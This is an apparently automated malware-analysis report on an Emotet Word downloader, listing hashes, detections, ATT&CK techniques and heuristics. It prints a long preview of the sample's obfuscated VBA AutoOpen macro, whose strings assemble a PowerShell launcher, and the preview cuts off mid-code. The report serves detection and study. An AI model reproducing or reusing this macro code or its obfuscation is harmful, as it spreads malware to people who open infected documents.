Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 455c326f5acf6c73…

MALICIOUS

Office (OLE)

237.5 KB Created: 2018-06-28 13:49:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: 97a9e3c78bb3967520e6b348ee1d9858 SHA-1: c09c7ca86d4002c369a1737bf878bd5655fc3ce1 SHA-256: 455c326f5acf6c73c057e6d8f1ca184cc628ec05557535efbf638ef8556efbf1
242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6958980-0'. Static analysis revealed the presence of VBA macros, specifically an AutoOpen macro that utilizes the Shell() function. This indicates the document is designed to execute arbitrary commands, a common tactic for Emotet malware to download and install further malicious components.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6958980-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6958980-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11809 bytes
SHA-256: ae1a91396e9e06f8fa039365863719c5fe6a585e072b694adce9f274d58e9b56
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DvXzFrbQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SEzhncotjwZdl"
Function PjzwEX()
On Error Resume Next
UMZwNw _
= 62697 + Atn(713) / 84970 / _
Round(57327) / 71986 / CInt(ZBtmw)
woHzmJ = ChrB(40045 + _
Sin(JQbVXi * CLng(ZojXN + 65191) _
 + 91319 _
+ jLSPXv))
jhQOWc = "HELL  " + "     " + "       " + "     " + "    " + "         "
GCiYY _
= 55667 + Atn(63261) / 41291 / _
Round(49735) / 31280 / CInt(bpPZWG)
LzNJP = ChrB(72555 + _
Sin(CzanU * CLng(wqlKYn + 98071) _
 + 11496 _
+ sSJGjG))
KmToq = "     " + "    " + Chr(34) + " $" + Chr(40) + "sEt-" + "VarIAbL" + "E  'OfS' " + " ''" + Chr(41) + " " + Chr(34) + " " + Chr(43) + " [st" + "RinG]" + Chr(40) + " " + Chr(40) + "46 ,97 " + ",71 "
ZHoLI _
= 24052 + Atn(93027) / 19585 / _
Round(93175) / 75395 / CInt(WVdGhF)
jkDFA = ChrB(68770 + _
Sin(BjGvA * CLng(CvwZS + 98308) _
 + 17157 _
+ kubOlq))
PzpPEOF = ", 10" + "0, 55" + " , 1" + "00, 111 ," + " 125," + "39 , 101" + ", 104,9" + "6 , 111" + " , 105,1" + "26 ," + "42,68, "
kzmkEk _
= 4621 + Atn(43646) / 5904 / _
Round(39302) / 13957 / CInt(EGcpP)
iubZDn = ChrB(66610 + _
Sin(kwpbrP * CLng(iQlTKv + 46378) _
 + 99996 _
+ tFLuE))
tcZkX = "111 ,126 " + ", 36 ,93 " + ", 111,1" + "04, 73 ," + "102 ,9" + "9, 111," + "100,126 " + ",49, 46 "
HEMRGw _
= 1342 + Atn(20487) / 89081 / _
Round(99255) / 4245 / CInt(zFhbd)
LZqqVF = ChrB(2140 + _
Sin(uDjwb * CLng(rGokPZ + 16579) _
 + 94772 _
+ GrUHmY))
LDtoC = ",94 ,70,6" + "6,55 ,45" + ", 98 ," + " 126 ,12" + "6, 122 ,4" + "8 ,37" + " , 37," + " 125 ,"
rRcTii _
= 78310 + Atn(32976) / 67260 / _
Round(14430) / 31913 / CInt(BziwY)
QtRwM = ChrB(7596 + _
Sin(OvjzBz * CLng(iALOW + 14958) _
 + 10589 _
+ RXBHI))
tXwsHJ = " 125," + "125,36,97" + " ,101" + ",120" + ",111,1" + "02 , " + "101, 12"
PjzwEX = jhQOWc + KmToq + PzpPEOF + tcZkX + LDtoC + tXwsHJ
vjcvw _
= 88662 + Atn(42515) / 58880 / _
Round(55151) / 89934 / CInt(YkUiF)
hKCSB = ChrB(72237 + _
Sin(ZQIDc * CLng(uEvaSO + 14710) _
 + 6912 _
+ CsDXR))
End Function
Function CnIjzc()
On Error Resume Next
wXkiM _
= 10445 + Atn(39177) / 94462 / _
Round(12614) / 81351 / CInt(vMVflS)
izAcJ = ChrB(3768 + _
Sin(zObHK * CLng(iUFbs + 45263) _
 + 46901 _
+ oaHok))
XouiaOzG = "6, 101 " + ",103" + " ,10" + "1, 126, 9" + "9 , " + "124 , 36" + ", 100 ,1"
TvhZR _
= 48595 + Atn(2599) / 78440 / _
Round(33060) / 17532 / CInt(NiKOr)
pwbPaG = ChrB(88702 + _
Sin(OuluZs * CLng(YdACjC + 81344) _
 + 70645 _
+ pDwGf))
cazcGqUhTF = "11 ," + "126 ,3" + "7 , " + "109 , " + "123, " + "61,79" + " ,93" + ", 50 , 3" + "7 ,74," + "98 ," + " 126,"
NBzhSs _
= 17133 + Atn(17806) / 86585 / _
Round(77876) / 76373 / CInt(CiPurQ)
oFKMKq = ChrB(98703 + _
Sin(OaXJn * CLng(Zhkwr + 51070) _
 + 92918 _
+ THNsP))
XzPkkZs = "126 " + ",122, 4" + "8 ,37" + ", 37, 12" + "5,125 ," + " 125," + " 36 ,10" + "0, 111 ," + "125,12" + "1,126 " + ", 111, " + "109 , "
GzuLjZ _
= 81027 + Atn(66981) / 5234 / _
Round(78191) / 75126 / CInt(SjuiVi)
fdzizz = ChrB(80574 + _
Sin(YmDwRb * CLng(FQfLd + 27261) _
 + 33832 _
+ iwJAHQ))
iYPjTJw = "36,105, 1" + "01 ," + " 103, 37" + " , 73" + ",123,73 ," + " 107 , " + "37, 7" + "4 , 98 ," + "126 , 12" + "6, 1" + "22, 4" + "8 ,37 , "
kljsk _
= 19006 + Atn(16261) / 36888 / _
Round(94204) / 22482 / CInt(oRwwpV)
GadDJ = ChrB(2888 + _
Sin(NmTioz * CLng(UDBSPY + 82760) _
 + 4096 _
+ ziAmZA))
XZMLHrmwc = "37, 125 ," + " 125, 12" + "5 , 36," + "120 ,101," + "121 " + ", 111" + " ,102," + "124, 9" + "9, 3" + "6 , 105," + "102,37"
fGojBp _
= 84017 + Atn(64579) / 54028 / _
Round(64443) / 13555 / CInt(XpkIM)
UNvja = ChrB(93879 + _
Sin(EdjUJ * CLng(MNsnc + 99836) _
 + 30160 _
+ iLTqiR))
DiHdzPVO = ",100 , " + "57 , " + "123,89 ,9" + "4 ,66 ," + "37 ,74 ,9" + "8, 12" + "6 ,12" + "6 , 12" + "2,48 ," + "37,37,"
iIMZo _
= 58399 + Atn(8923
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.